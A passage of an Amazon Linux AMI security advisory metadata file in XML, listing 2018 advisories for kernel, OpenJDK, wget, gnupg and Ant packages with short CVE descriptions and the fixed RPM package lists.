By mmap()ing a FUSE-backed file onto a process&#039;s memory containing command line arguments (or environment strings), an attacker can cause utilities from psutils or procps (such as ps, w) or any other program which makes a read() call to the /proc/&lt;pid&gt;/cmdline (or /proc/&lt;pid&gt;/environ) files to block indefinitely (denial of service) or for some controlled time (as a synchronization primitive for other attacks).
1575472:
CVE-2018-1120 kernel: fuse-backed file mmap-ed onto process cmdline arguments causes denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1120" title="" id="CVE-2018-1120" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639" title="" id="CVE-2018-3639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3693" title="" id="CVE-2018-3693" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.47" release="56.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.47" release="56.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-4.14.47-56.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1039</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1039: important priority package update for java-1.8.0-openjdk</title><issued date="2018-06-08 18:34:00" /><updated date="2018-06-11 21:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3639:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load &amp; Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that a memory read from an address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.
1566890:
CVE-2018-3639 hw: cpu: speculative store bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639" title="" id="CVE-2018-3639" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-headless" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.171-8.b10.38.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.171-8.b10.38.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.171" 
release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1040</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1040: medium priority package update for wget</title><issued date="2018-06-08 18:35:00" /><updated date="2018-06-11 21:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0494:
A cookie injection flaw was found in wget. An attacker can create a malicious website which, when accessed, overrides cookies belonging to arbitrary domains.
1575634:
CVE-2018-0494 wget: Cookie injection allows malicious website to write arbitrary cookie entries into cookie jar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0494" title="" id="CVE-2018-0494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget-debuginfo" version="1.18" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-4.29.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.18" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-4.29.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.18" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-4.29.amzn1.i686.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-4.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1044</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1044: medium priority package update for kernel</title><issued date="2018-06-27 21:53:00" /><updated date="2018-07-24 21:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-12232:
A NULL pointer dereference issue was found in the Linux kernel. If the close() and fchownat() system calls share a socket file descriptor as an argument, then the two calls can race and trigger a NULL pointer dereference leading to a system crash and a denial of service.
1590215:
CVE-2018-12232 kernel: NULL pointer dereference if close and fchownat system calls share a socket file descriptor
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12232" title="" id="CVE-2018-12232" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.51-60.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2018-1045</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1045: important priority package update for gnupg gnupg2</title><issued date="2018-06-27 21:57:00" /><updated date="2025-04-23 21:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-9234:
GnuPG 2.2.4 and 2.2.5 do not enforce a configuration in which key certification requires an offline master Certify key, which results in apparently valid certifications that were made only with access to a signing subkey.
CVE-2018-12020:
A data validation flaw was found in the way gnupg processes file names during decryption and signature validation. An attacker may be able to inject messages into gnupg verbose message logging which may have the potential to bypass the integrity of signature authentication mechanisms and could have other unintended consequences if applications take action(s) based on parsed verbose gnupg output.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12020" title="" id="CVE-2018-12020" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9234" title="" id="CVE-2018-9234" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg" version="1.4.19" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.19-1.29.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.19" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.19-1.29.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.19" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.19-1.29.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.19" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.19-1.29.amzn1.i686.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.28-2.32.amzn1.i686.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.28-2.32.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.32.amzn1" epoch="0" 
arch="i686"><filename>Packages/gnupg2-2.0.28-2.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1046</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1046: medium priority package update for kernel</title><issued date="2018-07-23 20:51:00" /><updated date="2018-07-24 21:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11412:
The fs/ext4/inline.c:ext4_read_inline_data() function in the Linux kernel performs a memcpy with an untrusted length value in certain circumstances involving a crafted filesystem that stores the system.data extended attribute value in a dedicated inode. The unbound copy can cause memory corruption or possible privilege escalation.
1582358:
CVE-2018-11412 kernel: out-of-bounds memcpy in fs/ext4/inline.c:ext4_read_inline_data() with crafted ext4 image
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11412" title="" id="CVE-2018-11412" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.55" release="62.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-headers-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.55-62.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2018-1047</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1047: medium priority package update for ant</title><issued date="2018-07-23 20:56:00" /><updated date="2018-07-24 21:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10886:
It was discovered that Ant&#039;s unzip and untar targets permit the extraction of files outside the target directory. A crafted zip or tar file submitted to an Ant build could create or overwrite arbitrary files with the privileges of the user running Ant.
1584407:
CVE-2018-10886 ant: arbitrary file write vulnerability and arbitrary code execution using a specially crafted zip file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10886" title="" id="CVE-2018-10886" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ant-javadoc" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-javadoc-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-commons-net" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-commons-net-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-commons-logging" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-commons-logging-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-antlr" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-antlr-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-oro" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-oro-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-resolver" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-resolver-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-scripts" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-scripts-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-testutil" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-testutil-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-swing" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-swing-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-manual" version="1.8.3" 
release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-manual-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-jdepend" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-jdepend-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-bsf" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-bsf-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-xalan2" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-xalan2-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-jmf" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-jmf-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-javamail" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-javamail-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-log4j" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-log4j-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-bcel" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-bcel-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-jsch" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-jsch-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-junit" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-junit-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-regexp" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-regexp-1.8.3-1.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2018-1048</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1048: low priority package update for kernel</title><issued date="2018-08-04 23:47:00" /><updated date="2018-08-06 18:27:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-13094:
An issue was discovered in the XFS filesystem in fs/xfs/libxfs/xfs_attr_leaf.c in the Linux kernel. A NULL pointer dereference may occur for a corrupted xfs image after xfs_da_shrink_inode() is called with a NULL bp. This can lead to a system crash and a denial of service.
1597771:
CVE-2018-13094 kernel: NULL pointer dereference in xfs_da_shrink_inode function
CVE-2018-13093:
An issue was discovered in the XFS filesystem in fs/xfs/xfs_icache.c in the Linux kernel. There is a NULL pointer dereference leading to a system panic in lookup_slow() on a NULL inode-&gt;i_ops pointer when doing pathwalks on a corrupted xfs image. This occurs because of a lack of proper validation that cached inodes are free during an allocation.
1597766:
CVE-2018-13093 kernel: NULL pointer dereference in lookup_slow function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13093" title="" id="CVE-2018-13093" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13094" title="" id="CVE-2018-13094" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package 
